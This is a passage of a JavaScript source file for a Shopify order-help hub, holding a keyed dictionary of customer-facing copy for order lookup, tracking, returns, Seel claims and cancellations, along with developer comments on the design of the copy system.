                     "this setting — type a real value or leave it alone.");
      }
    }
  });
}
lcRestoreBlankedStrings();


/* ONE SOURCE OF TRUTH FOR "WHICH PRODUCTS ARE PERSONALISED".
   A JavaScript object literal cannot reference its own siblings while it is
   being built, so the default is applied here, one line after it is closed.
   Leave CONFIG.catalogue.excludeCollection blank and the swap picker excludes
   exactly the collection the personalisation snippet renders for; set it and
   that override is honoured. Either way there is one handle to change, not two
   that can silently drift apart. */
if (!CONFIG.catalogue.excludeCollection) {
  CONFIG.catalogue.excludeCollection = CONFIG.personalisation.collection;
}

/* ===========================================================================
   COPY — THE KEYED DICTIONARY.  Layer 1 of the three-layer copy system.
   ---------------------------------------------------------------------------
   EVERY user-facing string the hub can render lives in this object, under a
   stable, namespaced, human-readable key. Nothing below this block writes a
   customer-visible sentence as an inline literal; every one of them is
   `t("some.key")`. That is the point: the merchant can reach ALL of the copy,
   and — just as importantly — can TELL that they can, because the file has no
   second, silently-uneditable half.

   THE THREE LAYERS, merged in this order, last wins:

     1. these defaults;
     2. the section's grouped copy settings (the ~70 strings a shop owner
        realistically rewords — headings, body paragraphs, button labels, the
        "what happens next" notes). They arrive in the config blob as
        `copyText`, keyed by the SAME ids used here. The eleven legacy
        `CONFIG.copy` settings are folded in at this layer too, through
        COPY_LEGACY_KEYS, so nothing a merchant has already typed is lost;
     3. `copy_override` blocks — a key and a value — which arrive as
        `copyOverrides` and can reach any key in this file, including the ones
        with no dedicated setting.

   A BLANK OVERRIDE IS "NOT SET", NEVER "RENDER NOTHING". A merchant who clears
   a field gets the shipped default back. A key that is not in this dictionary
   at all (a typo in a copy_override block) renders the key itself and logs —
   ugly, findable, and never a blank screen or a missing button label.

   PLACEHOLDERS are `{name}` and are substituted from the vars object passed to
   t(). An unknown placeholder is left alone rather than printed as "undefined",
   so a merchant who deletes one from an override loses a value, not the whole
   sentence.

   %%TOKENS%% (%%supportEmail%%, %%maxLength%%, %%shippingPolicy%% …) resolve in
   every string, not just in the two that used to support them — see
   lcTokenMap(). Merchants already know the syntax from the FAQ blocks.

   HTML. Some values carry <strong>, <em> or an <a>. They are interpolated into
   markup exactly where the literal they replaced was, so the escaping
   discipline of every call site is unchanged: a value the old code escaped is
   still escaped, and a value it did not is still not. Section settings are
   merchant-authored and trusted in the same way `faq_item.answer` (a richtext
   setting) already is.

   THE ADDRESS CONFIRMATION CHECKBOX (address.review.confirmLabel) is the
   client's own wording and is reproduced here verbatim, byte for byte. It may
   now be overridden; its SHIPPED DEFAULT must not change.

   shopify/COPY-KEYS.md is GENERATED FROM THIS OBJECT by
   shopify/tools/generate-copy-keys.mjs. Add a key here, re-run it, and the
   reference cannot drift. Do not hand-edit COPY-KEYS.md.
   =========================================================================== */
var COPY = {

  /* ---- shared chrome, buttons and vocabulary --------------------------- */
  "shared.carrierGeneric": "our shipping partners",
  "shared.back": "Back",
  "shared.backToOptions": "Back to all options",
  "shared.session.viewing": "Viewing order <strong>{order}</strong>",
  "shared.session.switch": "Not your order? Start again",
  "shared.stepAnnounce": "{title}. Step {step}.",
  "shared.error.heading": "Something went wrong on our end",
  "shared.error.body": "Sorry — we could not load that step. This is our fault, not yours, and nothing you have done has been lost.",
  "shared.error.emailLine": "Please email <a href=\"mailto:{email}\">{email}</a> with your order number in the subject line and we will sort it out for you.",
  "shared.btn.backToHub": "Back to the help hub",
  "shared.btn.checkStatus": "Check my order status",
  "shared.btn.seeMyStatus": "See my order status",
  "shared.btn.emailUs": "Email us",
  "shared.btn.emailAboutOrder": "Email us about this order",
  "shared.btn.seeReturns": "See how returns work",
  "shared.btn.track": "Track my parcel",
  "shared.btn.tryAgain": "Try sending again",
  "shared.btn.cancel": "Cancel",
  "shared.btn.next": "Continue",
  "shared.btn.back": "Go back",
  "shared.btn.startAgain": "Start again",
  "shared.btn.sending": "Sending your request…",
  "shared.say.sending": "Sending your request…",
  "shared.say.alreadySent": "This request has already been sent.",
  "shared.say.idleTimeout": "You were inactive, so we closed your order for privacy. You can look it up again.",
  "shared.mail.subjectHelp": "Help with order {order}",
  "shared.newTab": " (opens in a new tab)",
  "shared.trackNote": "Opens our tracking page in a new tab — it shows every scan as your parcel moves.",
  "shared.destinationFallback": "your delivery address",
  "shared.quantity": "Quantity {qty}",
  "shared.optional": "(optional)",

  /* Date and duration vocabulary. Keyed so the hub can be reworded or
     translated without touching code; the ORDER of the parts is a key too. */
  "shared.month.1": "January",
  "shared.month.2": "February",
  "shared.month.3": "March",
  "shared.month.4": "April",
  "shared.month.5": "May",
  "shared.month.6": "June",
  "shared.month.7": "July",
  "shared.month.8": "August",
  "shared.month.9": "September",
  "shared.month.10": "October",
  "shared.month.11": "November",
  "shared.month.12": "December",
  "shared.day.0": "Sunday",
  "shared.day.1": "Monday",
  "shared.day.2": "Tuesday",
  "shared.day.3": "Wednesday",
  "shared.day.4": "Thursday",
  "shared.day.5": "Friday",
  "shared.day.6": "Saturday",
  "shared.date.full": "{day} {month} {year}",
  "shared.date.time": "{date}, {time}",
  "shared.placed.today": "today ({date})",
  "shared.placed.on": "on ({date})",
  "shared.dispatch.everyDay": "every day",
  "shared.dispatch.everyDayExcept": "every day except {day}",
  "shared.countdown.long": "{days} {dayWord} {hours}h {minutes}m",
  "shared.countdown.short": "{hours}h {minutes}m {seconds}s",
  "shared.countdown.dayOne": "day",
  "shared.countdown.dayMany": "days",

  /* ---- flow names, used as page titles on the lookup screen ------------- */
  "flow.orderStatus.label": "Where's my order?",
  "flow.addressChange.label": "Change shipping address",
  "flow.cancelOrder.label": "Cancel my order",
  "flow.amendOrder.label": "Change what I ordered",
  "flow.fixSpelling.label": "Fix my spelling",
  "flow.refundReturn.label": "Returns & refunds",
  "flow.somethingElse.label": "Something else",
  "flow.fallback.label": "Help",

  /* ---- plain-English status vocabulary --------------------------------- */
  "status.plain.cancelled": "Cancelled",
  "status.plain.onHold": "Paused while we look at it",
  "status.plain.dispatched": "On its way",
  "status.plain.trackingAssigned": "Packed and labelled, not collected yet",
  "status.plain.partiallyFulfilled": "Part of it is on its way",
  "status.plain.fulfilledNoTracking": "Packed",
  "status.plain.open": "Waiting to be packed",
  "status.plain.unknown": "Being checked",

  /* ---- the order summary card ------------------------------------------ */
  "summary.heading": "Order {order}",
  "summary.chip.delivered": "Delivered",
  "summary.chip.dispatched": "On its way",
  "summary.chip.trackingAssigned": "Packed, not collected yet",
  "summary.chip.cancelled": "Cancelled",
  "summary.chip.onHold": "On hold",
  "summary.chip.partiallyFulfilled": "Part of it is on its way",
  "summary.chip.fulfilledNoTracking": "Packed",
  "summary.chip.open": "Waiting to be packed",
  "summary.chip.unknown": "Being checked",
  "summary.label.placed": "Placed",
  "summary.label.total": "Order total",
  "summary.label.deliveringTo": "Delivering to",
  "summary.seelNote": "Purchase protection, not a toy — nothing extra is posted to you.",

  /* ---- the "Your parcel" tracking card ---------------------------------- */
  "status.parcel.heading": "Your parcel",
  "status.parcel.headingMany": "Your parcel — parcel {index} of {total}",
  "status.parcel.label.order": "Order",
  "status.parcel.label.status": "Status",
  "status.parcel.label.placed": "Placed",
  "status.parcel.label.headingTo": "Heading to",
  "status.parcel.label.tracking": "Tracking number",

  /* ---- the dispatch countdown card -------------------------------------- */
  "countdown.heading": "Waiting to be packed",
  "countdown.body": "Your order is paid and waiting with our packing team. We hand everything to the courier in one batch a day, every day except Sunday, so there is no tracking number yet — that is completely normal.",
  "countdown.nextBatch": "<strong>Next dispatch batch in</strong>",
  /* "…are pulled for packing ahead of the batch", NOT "get picked up for
     packing throughout the day". This card's own body two paragraphs above says
     we hand everything over IN ONE BATCH A DAY, and the whole project is built
     on that model — see the note above the DISPATCHED branch of
     submitOutcome(), where an earlier "they take orders through the day rather
     than at one set time" was retired for exactly this reason. A reassurance
     that contradicts the card it sits on is worse than no reassurance. */
  "countdown.changeNote": "<strong>Need to change something?</strong> Do it now rather than closer to the time. Orders are pulled for packing ahead of the batch, so the sooner you tell us, the better the chance we catch it.",
  "countdown.when": "That is {when} at {time} New Zealand time, where our packing team is.",
  "countdown.whenNoTimezone": "That is {when} at {time}.",
  "countdown.whenPrefixed": "{prefix} ({day})",
  "countdown.today": "today",
  "countdown.tomorrow": "tomorrow",

  /* ---- the hub front screen --------------------------------------------- */
  "hub.heading": "How can we help you today?",
  "hub.intro": "Pick whichever sounds closest — there is no wrong door. Most of these take under a minute to sort out yourself; have your order number and the email you ordered with to hand.",
  "hub.faq.heading": "Something else?",
  "hub.faq.intro": "Type your question the way you would say it out loud. Answers appear as you type.",
  "hub.faq.label": "Search our answers",
  "hub.faq.placeholder": "e.g. how do I fold the pool tent",
  "hub.faq.human": "I still need help from a person",
  "hub.faq.resultsLabel": "Search results",

  /* ---- FAQ search results and the answer renderer ----------------------- */
  "faq.count.fallback": "No direct match. Showing how to reach us.",
  "faq.count.one": "1 answer found",
  "faq.count.many": "{n} answers found",
  "faq.count.plusHuman": ", plus how to reach a person",
  "faq.showingHuman": "Showing how to reach a person.",
  "faq.video.name": "Video: {question}",
  "faq.video.playLabel": "Play video: {question}",
  "faq.video.playText": "Play the video",
  "faq.video.openFallback": "Open the video",
  "faq.video.notePoster": "Only the preview image loads &mdash; the video itself downloads nothing until you press play.",
  "faq.video.noteNoPoster": "Nothing downloads until you press play.",

  /* ---- order lookup ------------------------------------------------------ */
  /* THE CLIENT'S OWN WORDING, VERBATIM. It does the work the three per-field
     hints used to do — where to look for the number, what the number looks
     like, what to do next — in one paragraph the customer reads once, instead
     of three grey lines they read while already looking at the fields. Keep it
     plain: no <strong>, no rephrasing. It stays overridable (cp_lookup_intro).

     LC12345 IS THE ONLY SAMPLE ORDER NUMBER ALLOWED, and it is deliberately
     not one of ours. The example this replaced was taken from a live order,
     which meant a real customer's order number was printed on a public page,
     in the theme editor and in an FAQ answer — and the lookup gate is an order
     number plus the matching email, so a real number is one of the two halves
     handed out for free. Placeholder, hints, error text, FAQ answers and the
     section schema's info strings all say LC12345 and nothing else. This file
     is served from the CDN as plain text, so that rule covers the comments as
     much as the strings: do not paste a real order number in here either. */
  "lookup.intro": "First, let's find your order. Search your email inbox for Little Cubs (be sure to check the promotions and spam folder). Your order number will look similar to: LC12345. Pop your order number and email in the form below and click \"Find my order\".",
  "lookup.order.label": "Order number",
  "lookup.order.placeholder": "LC12345",
  "lookup.email.label": "Email address",
  "lookup.email.placeholder": "you@example.com",
  "lookup.name.label": "Your name",
  /* NO `lookup.order.hint` / `lookup.email.hint` / `lookup.name.hint`. The three
     hint paragraphs were removed from the form in round 7 — they were what made
     it look cluttered — so their keys are gone from the dictionary too rather
     than left here as overridable strings that nothing renders. A copy key a
     merchant can set and never see is the exact failure COPY-KEYS.md exists to
     prevent. The two SETTINGS that fed them (cp_lookup_order_hint,
     cp_lookup_email_hint) are deliberately still in the schema with their ids
     intact — see the note there — because removing a setting id would orphan
     the client's saved theme-editor value. */
  "lookup.honeypot.label": "Website",
  "lookup.submit": "Find my order",
  "lookup.busy": "Looking up your order…",
  "lookup.say.busy": "Looking up your order. This takes a moment.",
  "lookup.spamNote": "Cannot find your confirmation email? Search your inbox for <strong>Little Cubs</strong> — it is usually in spam or promotions.",
  "lookup.err.orderRequired": "Please enter your order number.",
  "lookup.err.orderFormat": "That does not look like one of our order numbers. It is the letters LC followed by {digits} digits, like LC12345.",
  "lookup.err.emailRequired": "Please enter your email address.",
  "lookup.err.emailFormat": "That email address looks incomplete — please check it.",
  "lookup.fail.recheck": "We could not find an order matching those details. Please check the order number and that the email is the one you ordered with.",
  "lookup.fail.stuckSuffix": " If it still will not match, email {email} with your order number and we will find it for you.",
  "lookup.say.fail": "We could not find an order matching those details.",
  "lookup.say.failStuck": "We still could not find that order. The message now includes an email address for us so a person can find it for you.",

  /* ---- "Where's my order?" ---------------------------------------------- */
  "status.heading": "Where’s my order?",
  "status.timeline.heading": "Your order’s journey",
  "status.timeline.placed": "Order placed",
  "status.timeline.payment": "Payment confirmed",
  "status.timeline.paid": "Paid in full",
  "status.timeline.pending": "Pending",
  "status.timeline.packedLabelled": "Packed and labelled",
  "status.timeline.packedCourier": "Packed and handed to the courier",
  "status.timeline.awaitingCollection": "Waiting to be collected",
  "status.timeline.done": "Done",
  "status.timeline.nextDispatch": "Happens in our next dispatch — {days}",
  "status.timeline.onItsWay": "On its way to you",
  "status.timeline.notCollected": "Not yet — it has not been collected",
  "status.timeline.followTracking": "Follow it on our tracking page",
  "status.timeline.notYet": "Not yet",
  "status.timeline.arriving": "Arriving soon",
  "status.timeline.watchDelivery": "Watch for the delivery attempt",
  "status.timeline.delivered": "Delivered",
  "status.timeline.deliveredNote": "We will email you when it lands",
  "status.labelled.heading": "Packed and labelled — not collected yet",
  "status.labelled.body": "Your order has been packed and a label printed for it, but as far as we can tell it has not left our packing team yet.",
  "status.labelled.note": "That number appears when the label is printed, not when the parcel leaves — so our tracking page will not have anything to show for it yet. Once it is collected the scans start appearing there. ",
  "status.trackingLinkLabel": "Open our tracking page",
  "status.noTracking.heading": "Packed — tracking number on its way",
  "status.noTracking.body": "Your order has been packed and collected, but we have not been sent the tracking number yet. It usually appears within a day, and we will email it to you the moment it does.",
  "status.haveTrackingNote": "Already have a tracking number from an earlier email? ",
  "status.partial.heading": "This order is coming in more than one parcel",
  "status.partial.body1": "Part of your order has already been packed and handed over. The rest is still with our packing team and goes out in a later batch, so the two parts may arrive a few days apart. Nothing has been forgotten.",
  "status.partial.body2": "Because one parcel has already gone, we can no longer cancel or redirect this order as a whole — but if something is wrong we can still put it right once it arrives.",
  "status.returns.heading": "Anything else about this order?",
  "status.next.interceptNote": "Your order is packed and labelled but has not left us yet. We can still <strong>ask</strong> our packing team to change or stop it — they can often catch it at this stage, though we cannot promise it.",
  "status.next.changeAddress": "Change my address",
  "status.next.changeItems": "Change what I ordered",
  "status.next.fixSpelling": "Fix my spelling",
  "status.next.cancel": "Cancel my order",
  "status.next.onHold": "This order is paused while we deal with an earlier request — there is nothing else you need to do. If something has changed since you asked, <a href=\"{mailHref}\">email us about this order</a>.",
  "status.next.unconfirmed": "Nothing has been posted yet. If you need to change something, <a href=\"{mailHref}\">email us about this order</a> and we will check it by hand.",

  /* ---- returns & refunds -------------------------------------------------

     EVERY KEY BELOW 'returns.btn.start' WAS REPLACED, and the ones that used to
     be here are gone rather than left orphaned. The old screen explained
     Shopify's account-based returns process — sign in, we approve, you post it
     back, usually the same working day — and every one of those sentences is
     now false: there is no account step, nothing is posted back in the ordinary
     case, and the timescale was a promise made on the packing team's behalf.
     Leaving the strings in the dictionary would have put them in COPY-KEYS.md
     for the client to edit, describing a flow that no longer exists.
     ---------------------------------------------------------------------- */
  /* PLAIN "&", NOT "&amp;". Every use of this key goes through esc(), which is
     the right default for merchant-editable copy — so a pre-escaped entity here
     came back out of esc() as a literal "&amp;" on the customer's screen. The
     entity was correct for the old screen, which interpolated this key raw.
     Copy holds text; escaping is the renderer's job. */
  "returns.heading": "Returns & refunds",
  "returns.theItem": "your item",
  "returns.humanNote": "Would rather talk to a person? Email <a href=\"mailto:{email}?subject=Return%20request\">{email}</a> with your order number and we will pick it up from there.",

  "returns.promise.heading": "How this works",
  "returns.promise.body": "You have <strong>{window} days from the day it arrives</strong>. In almost every case you will <strong>not</strong> need to post anything back to us — tell us what happened, send a photo if something is damaged, and we will sort it out from there. <strong>No restocking fees, ever.</strong>",

  "returns.start.intro": "Tell us what went wrong and we will take it from there. It takes about a minute.",
  "returns.start.heading": "What is the problem?",
  "returns.start.pickOne": "Please choose the option that fits best.",
  /* The returns form's own Continue button. It has a dedicated key rather than
     borrowing shared.btn.next because the setting cp_returns_btn_start — which
     labelled the "Start a return" button on the screen this flow replaced — is
     saved in the client's live theme and had nothing left to feed. This is the
     button that starts a return now, so it is the honest home for it. */
  "returns.btn.next": "Next",
  "returns.item.heading": "Which item?",

  "returns.reason.damaged-in-transit.label": "It arrived damaged",
  "returns.reason.damaged-in-transit.hint": "Broken, torn, cracked or marked when you opened it",
  "returns.reason.faulty.label": "It stopped working, or it never did",
  "returns.reason.faulty.hint": "A fault with the product itself rather than the parcel",
  "returns.reason.wrong-item.label": "The wrong thing arrived",
  "returns.reason.wrong-item.hint": "A different product, colour or size from the one ordered",
  "returns.reason.never-arrived.label": "It never turned up",
  "returns.reason.never-arrived.hint": "Tracking says delivered, or it has simply not come",
  "returns.reason.not-as-described.label": "It is not what I expected",
  "returns.reason.not-as-described.hint": "Smaller, different or not as the page described it",
  "returns.reason.changed-mind.label": "I changed my mind",
  "returns.reason.changed-mind.hint": "Nothing wrong with it — it is just not for us",

  "returns.severity.heading": "How bad is it?",
  "returns.severity.intro": "This tells us what to do about {item} — whether a bit back is the right answer, or a whole new one.",
  "returns.severity.cosmetic.label": "Marked or scuffed, but it works fine",
  "returns.severity.cosmetic.hint": "A scratch, a scuff, a nick in the packaging",
  "returns.severity.impaired.label": "Damaged, but we can still use it",
  "returns.severity.impaired.hint": "Something is wrong with it but it still does its job",
  "returns.severity.unusable.label": "It cannot be used at all",
  "returns.severity.unusable.hint": "Broken, unsafe, or missing something it needs",

  "returns.evidence.heading": "Show us the problem",
  "returns.evidence.intro": "Photos are what let us sort this out quickly and without you posting anything back. Three quick ones is all we need.",
  "returns.evidence.unavailable": "We cannot take photos on this page just now. Email <a href=\"mailto:{email}?subject=Return%20request\">{email}</a> with your order number and your photos attached, and a person will pick it up straight away.",
  "returns.evidence.missing": "Still needed: {shots}.",
  "returns.evidence.stillUploading": "One of your photos is still uploading — give it a moment.",
  "returns.evidence.privacy": "Your photos are only ever seen by us and our packing team, and we delete them after {months} months.",

  "returns.shot.problem.label": "The problem, close up",
  "returns.shot.problem.hint": "Get close enough that we can see exactly what is wrong",
  "returns.shot.item.label": "The whole item",
  "returns.shot.item.hint": "Stand back so we can see all of it",
  "returns.shot.label.label": "The shipping label on the bag",
  "returns.shot.label.hint": "The label with your address on the outside of the packaging",
  "returns.shot.extra.label": "Anything else",
  "returns.shot.extra.hint": "Only if there is something the other photos do not show",
  "returns.shot.required": "Needed",
  "returns.shot.optional": "Optional",
  "returns.shot.add": "Add photo",
  "returns.shot.replace": "Replace photo",
  "returns.shot.done": "Added ✓",
  "returns.shot.uploading": "Uploading…",
  "returns.shot.tooLarge": "That file is too big — please send one under 10MB.",
  "returns.shot.sayUploading": "Uploading your photo.",
  "returns.shot.sayDone": "{shot} added.",
  "returns.shot.failed.tooLarge": "That file is too big — please send one under 10MB.",
  "returns.shot.failed.notMedia": "That does not look like a photo or a video. Try again with an image from your camera roll.",
  "returns.shot.failed.tooMany": "That is as many photos as we can take for this order. The ones you have added are safe.",
  "returns.shot.failed.network": "That photo did not upload. Check your connection and try again.",

  "returns.detail.heading": "Tell us what happened",
  "returns.detail.intro": "In your own words. A sentence is plenty — you can leave it blank if the photos say it better.",
  "returns.detail.label": "What happened?",
  "returns.detail.count": "{used} of {max} characters",
  "returns.detail.hint.damaged-in-transit": "Where the damage is, and whether the outer packaging was damaged too.",
  "returns.detail.hint.faulty": "What it does, or stops doing, and when you first noticed.",
  "returns.detail.hint.wrong-item": "What arrived, and what you were expecting.",
  "returns.detail.hint.never-arrived": "Anything the tracking does not tell us — a neighbour, a safe place, a delivery photo.",
  "returns.detail.hint.not-as-described": "What you expected, and how what arrived was different.",
  "returns.detail.hint.changed-mind": "Nothing you have to explain — but if there is something we could do better, we do read these.",
  "returns.detail.hint.spelling-wrong": "The spelling you asked for, and the spelling that arrived.",

  "returns.review.heading": "Check this over",
  "returns.review.intro": "One last look before this goes to us.",
  "returns.review.whatHeading": "What you are telling us",
  "returns.review.rowReason": "Problem",
  "returns.review.rowItem": "Item",
  "returns.review.rowSeverity": "How bad",
  "returns.review.rowPhotos": "Photos",
  "returns.review.rowDetail": "In your words",
  "returns.review.rowDelivered": "Delivered",
  "returns.review.noPhotos": "None added",
  "returns.review.deliveredCertain": "{days} days ago",
  "returns.review.deliveredEstimated": "about {days} days ago",
  "returns.review.nextHeading": "What happens next",
  "returns.review.nextBody": "We will look at this ourselves and email you at <strong>{email}</strong> with what we can do. Nothing is decided by this form — a person reads every one of these.",
  "returns.review.next3pl": "We will also raise it with {threePL} while we are at it.",
  "returns.review.nextUs": "This one is entirely our decision, so you will hear from us directly.",
  "returns.review.confirmLabel": "This is all correct, and I understand nothing has been agreed yet.",
  "returns.review.send": "Send this to Little Cubs",

  "returns.success.heading": "We have got it",
  /* NO MARKUP. VIEWS.success escapes this, exactly as it does the other four
     blurbs — none of which contain any. The <strong> tags that were here
     rendered as literal angle brackets on the customer's confirmation. */
  "returns.success.blurb": "Your report about order {order} is with us. We will email {email} once someone has looked at it. Nothing has been agreed yet — that email will tell you exactly what we can do.",


  /* ---- THE HUB RATING -------------------------------------------------
     Shown at the bottom of every confirmation. Deliberately quiet: it is the
     last thing on the screen, it is skippable in the most literal way (do
     nothing), and it never asks for anything but a number and a sentence.

     THE WORDING IS ABOUT THIS TOOL, NOT ABOUT US. "Did this sort it out?" can
     be answered honestly by somebody who is still annoyed about their parcel,
     which is exactly the point — we are measuring whether the hub worked, and
     conflating that with how they feel about the order would make the number
     useless. */
  "rate.heading": "Did this sort it out?",
  "rate.intro": "One tap, and it only comes to us — it is how we find out whether this actually helps.",
  "rate.star": "{n} out of 5",
  "rate.low": "1 = not at all",
  "rate.high": "5 = completely",
  "rate.thanks": "Thank you — that is genuinely useful.",
  "rate.askLow": "Sorry that was not much help. What were you trying to do?",
  "rate.askHigh": "Anything you would change? (optional)",
  "rate.placeholder": "Type here if you want to. Nothing is required.",
  "rate.send": "Send",
  "rate.sent": "Sent. Thank you.",
  "rate.announce": "Rating sent. Thank you.",

  /* ---- THE SAVE-THE-SALE SCREEN --------------------------------------
     Shown INSTEAD of the plain confirmation when the Worker sends back an
     offer set. The customer came here expecting to wait for an email; this
     is the screen that tells them they do not have to. */
  "returns.offers.heading": "Here's what we can do",
  "returns.offers.intro": "Pick whichever suits you and we'll get on with it. Your claim on order {order} is already logged either way.",
  "returns.offers.recommended": "Our pick",
  "returns.offers.instant": "Instantly",
  "returns.offers.choose": "Choose this",
  "returns.offers.skipHeading": "None of these?",
  "returns.offers.skipBody": "That's fine — do nothing and a person will read your claim and email {email}.",
  "returns.offers.working": "One moment…",
  "returns.offers.failHeading": "We couldn't finish that just now",
  "returns.offers.failBody": "Nothing has been lost — your claim and your choice are both saved, and a person will pick it up and email {email}.",

  "returns.chosen.credit.heading": "Sorted — your credit is ready",
  "returns.chosen.credit.blurb": "We've put {amount} of store credit on your account for order {order}. It's there now, so there's nothing to send back and nothing else to do. Sign in with {email} next time you order and it comes straight off your total.",
  "returns.chosen.other.heading": "Thanks — that's noted",
  "returns.chosen.other.blurb": "We've recorded what you'd like for order {order}. Someone will email {email} with the next step, usually within a working day.",

  "returns.declined.heading": "This one we cannot take back",
  "returns.declined.whyHeading": "Why",
  "returns.declined.whyBody": "It is hand-knitted with your child's name on it, so there is nobody else it can go to. That is the one thing we cannot accept back simply because it is not wanted.",
  "returns.declined.coveredHeading": "What is still covered",
  "returns.declined.coveredBody": "Everything else. If it arrived damaged, has a fault, or the name is not what you asked for, tell us and you choose — a replacement or a full refund.",
  "returns.declined.btnOther": "Something else is wrong with it",

  "returns.lost.heading": "Let us start that again",
  "returns.lost.body": "We lost track of what you were telling us — that is on us, not you. Nothing was sent.",
  "returns.lost.restart": "Start again",

  "returns.blocked.notSent": "Good news: this order has not gone out yet, so there is nothing to send back. While it is still with us we can stop it or change where it is going.",
  "returns.blocked.btnCancel": "Cancel this order",
  "returns.blocked.btnAddress": "Change the address",
  "returns.blocked.cancelled": "Order {order} was cancelled, so there is nothing to return. If you were expecting money back and have not seen it, email us and we will check.",
  "returns.blocked.inTransit": "This one is still on its way, so it is too early to tell us what is wrong with it. Once it arrives, come back and we will sort out anything that is not right.",
  "returns.blocked.btnTrack": "See where it is",
  "returns.blocked.windowClosed": "This arrived {days} days ago, which is past our {window}-day window — but that does not mean we cannot help. If something has broken or was faulty from the start, email us and a person will look at it properly.",
  "returns.blocked.windowClosedEstimated": "Our records suggest this arrived about {days} days ago, past our {window}-day window — but we are not certain of that date, and a fault is a fault whenever it turns up. Email us and a person will look at it properly.",
  "returns.blocked.unknown": "We could not work out where this order has got to. Email us with your order number and we will look it up by hand.",

  /* ---- Worry-Free Purchase (Seel) — the covered path --------------------- */
  /* THE ONE RULE THESE STRINGS EXIST TO KEEP: Seel handle the claim, not us.
     Nothing below may imply Little Cubs opens, approves, pays or chases one.

     AND EXACTLY ONE OF SEEL'S WINDOWS IS QUOTED — 7 days from delivery for
     damage — because it is the one that costs a customer money if they miss
     it. The rest (90 days overall, 10 or 30 days before a delay claim opens)
     are Seel's, vary by merchant plan and change; restating them here would be
     making Seel's terms into our promise, and a promise we cannot keep reads
     to the customer as Little Cubs breaking one. Before launch the client
     confirms that 7 days against their own Seel merchant agreement — it was
     read off Seel's public shopper documentation, not off their contract. */
  "returns.seel.card.heading": "This order came with Worry-Free Purchase",
  "returns.seel.card.body": "That small extra line on your order is purchase protection from <strong>Seel</strong>. It covers the parcel itself — delayed, lost, stolen, or damaged on the way to you — and Seel handle those claims themselves. Seel decide what is covered and for how long. Anything else that is not right, tell us below and we will sort it out from here.",
  "returns.seel.deadline": "<strong>If it arrived damaged, or the tracking says delivered and nothing turned up, tell Seel within 7 days of the delivery date.</strong> That window is short, so please do not wait to see whether it sorts itself out.",

  "returns.seel.heading": "This order came with Worry-Free Purchase — claim it with Seel",
  "returns.seel.intro": "Order {order} came with Worry-Free Purchase, so there is a faster route for this one than going through us.",
  "returns.seel.whoHeading": "Who does what",
  "returns.seel.whoBody": "The cover is <strong>Seel's</strong>, not ours. They open the claim, they decide it and they pay it — we cannot do any of that on your behalf, which is exactly why going straight to them is the quickest way to get this put right. Have your order number, <strong>{order}</strong>, in front of you.",
  "returns.seel.btnClaim": "Start a claim with Seel",
  "returns.seel.faultyNote": "Worth knowing before you claim: Worry-Free Purchase covers what happens to your parcel. If the fault is with the product itself rather than something that happened on the way to you, Seel may not cover it — and it is ours to put right either way. If you are not sure which it is, tell us and we will look.",
  "returns.seel.lostNote": "Worth knowing before you claim: if the tracking says delivered and the parcel is not there, that is the one Seel want to hear about quickly — within 7 days. If it has simply not arrived yet, Seel treat that differently and give you longer, and we would rather you told us as well so we can chase it from our end.",
  "returns.seel.altHeading": "Would you rather we dealt with it?",
  "returns.seel.altBody": "Then carry on here and tell us what happened. Nothing changes about how we treat it, and it costs you nothing. Telling us does not use up your cover — but it does not pause Seel's 7 days either, so if you want to claim with them as well, do that first.",
  "returns.seel.btnCarryOn": "Tell Little Cubs instead",

  /* ---- "we can no longer do this" — shared across every flow ------------- */
  "ineligible.what.cancel": "cancel this order",
  "ineligible.what.amend": "change what was ordered",
  "ineligible.what.spelling": "change the spelling on a personalised item",
  "ineligible.what.address": "change the delivery address",
  "ineligible.noTrackingAdvice": "<strong>What you can usually still do.</strong> The tracking number normally comes through within a day and we will email it to you the moment it arrives. Once your parcel reaches your local delivery service, most of them let you hold it at a depot or pick-up point, redirect it nearby, or choose a different day — arranged directly with them, using that number.",
  "ineligible.cancelled.heading": "This order is already cancelled",
  "ineligible.cancelled.body": "Order {order} was cancelled, so there is nothing left to {what}. If you were expecting a refund and have not seen it, email us and we will check.",
  "ineligible.hold.heading": "We are already looking at this order",
  "ineligible.hold.bodyPartial": "Part of this order already has a parcel on its way, and the rest is paused with our packing team while we deal with an earlier request. <strong>Nothing further will be posted until they reply.</strong>",
  "ineligible.hold.body": "Your order is paused with our packing team while we deal with an earlier request. <strong>Nothing has been posted yet.</strong>",
  "ineligible.hold.note": "We will email you as soon as we hear back — there is nothing else you need to do. If something has changed since you asked, just reply to that email, or <a href=\"{mailHref}\">email us about this order</a>, and we will pick it up.",
  "ineligible.unconfirmed.heading": "We need to check this one by hand",
  "ineligible.unconfirmed.body1": "Our records show nothing has been packed and no parcel has been posted, but we cannot confirm from here whether there is still time to {what}. That usually just means the order is very new and our systems have not caught up with each other.",
  "ineligible.unconfirmed.body2": "Email us with your order number and we will check it ourselves and reply — usually the same working day. Please do not place a replacement order in the meantime.",
  "ineligible.packed.headingPartial": "Part of this order has already been packed",
  "ineligible.packed.heading": "This order has already been packed",
  "ineligible.packed.bodyPartial": "Some of your order has been packed and handed over, and the rest is still with our packing team. Because part of it has gone, we can no longer {what} for the order as a whole.",
  "ineligible.packed.body": "Your order has been packed and handed over, so we can no longer {what}.",
  "ineligible.packed.tail": " We would rather tell you that straight out than promise something and take it back.",
  "ineligible.packed.returnsNote1": "There is no tracking number yet — it usually comes through within a day, and we will email it to you the moment it arrives.",
  "ineligible.packed.returnsNote2": "<strong>What you can do instead:</strong> once it arrives you can send it back. You have 14 days from the day it lands to start that, and you do it in your Little Cubs account.",
  "ineligible.trackingBits": "Your tracking number is <strong>{number}</strong>, issued on {date}.",
  "ineligible.address.heading": "Your order is on its way — the address is now fixed",
  "ineligible.address.body": "Your order has been packed and handed to {carrier}, and the delivery address can no longer be changed. Once a parcel has a label on it, it goes to the address printed on that label — changing it on our side would not move the parcel, it would only make our records disagree with the one thing that actually decides where it lands.",
  "ineligible.address.advice": "<strong>What you can usually still do.</strong> Once your parcel reaches your local delivery service, most of them let you hold it at a depot or pick-up point, redirect it nearby, or choose a different day — arranged directly with them, using the tracking number above. Our tracking page is where to watch for that first delivery attempt, because that is the point at which those options appear.",
  "ineligible.address.cardNote": "If nobody is in, you will normally get a card and a second attempt.",
  "ineligible.address.policyLink": "Read the full shipping policy",
  "ineligible.cancel.heading": "Your order is on its way — it can no longer be stopped",
  "ineligible.cancel.body": "Your order has been packed and handed to {carrier}, so we can no longer cancel it, and the delivery address is now fixed as well. We would rather tell you that straight out than promise something and take it back.",
